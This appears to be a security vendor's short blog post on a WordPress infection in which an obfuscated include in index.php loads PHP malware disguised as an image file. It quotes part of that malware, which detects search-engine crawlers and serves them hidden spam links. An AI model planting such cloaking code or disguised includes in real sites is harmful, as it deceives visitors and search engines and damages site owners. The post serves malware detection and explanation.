Skip to content

Malware disguised as a JPG file in WordPress

Hackers insert incorrect including code into index.php

Please be careful if the WordPress display suddenly turns white, nothing is displayed, the layout is misplaced, or an unknown link or URL is displayed on the site.

@include(pack(Obfuscated code));

include is a process that reads a file from other program file, and pack is an function that binarizes data, but it is also an function that can embed an obfuscated illegal code.
When we decoded the above code ,

/wp-includes/images/wp-skin.jpg

It turned out that the JPG file was read like.

Malware disguised as JPG

When this wp-skin.jpg was opened, the following code was read into the file.

$fromsite = "http://www.xxxxxx.co.jp/shop/default.aspx";
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
$filename = "";
$mysite = 'http://'.$_SERVER['HTTP_HOST'].'/'; 
if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false || strpos($tmp, 'msn') !== false || strpos($tmp, 'goo') !== false) {

    $ksite = !empty($_GET['success']) ? $_GET['success'] : "";
    $list = array(
	'present' => 'http://www.xxxxxx.com/',
	'female watch' => 'http://www.xxxxx.com/', 

This code is a type of SEO hack that makes Google and Yahoo crawl a site as if it were linked from the site with a “present” or “female watch”.

* This virus pattern definition has already been installed in our WordPress malware / virus scanner